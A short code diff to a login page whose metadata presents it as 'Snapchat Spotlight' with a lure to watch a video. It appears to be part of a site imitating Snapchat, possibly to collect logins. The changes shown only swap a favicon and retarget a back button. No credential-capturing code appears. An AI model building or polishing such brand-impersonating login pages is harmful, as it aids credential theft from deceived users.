--- a/login.html
+++ b/login.html
@@ -3,7 +3,7 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0 user-scalable=no">
-  <link rel="shortcut icon" href="img/faviconV2.svg" type="image/x-icon">
+  <link rel="shortcut icon" href="img/faviconV2.png">
   <meta name="description" content="Watch this amazing video on Snapchat Spotlight!">
   <meta property="og:site_name" content="Snapchat Spotlight">
   <link rel="stylesheet" href="/css/login.css">
@@ -12,7 +12,7 @@
 </head>
 <body>
   <!-- Back Button -->
-  <button class="back-button" onclick="window.location.href='/index.html';">
+  <button class="back-button" onclick="window.location.href='/Acconts.html';">
     <img src="img/left-arrow.png"height="15px" width="15px" alt="">
   </button>
 
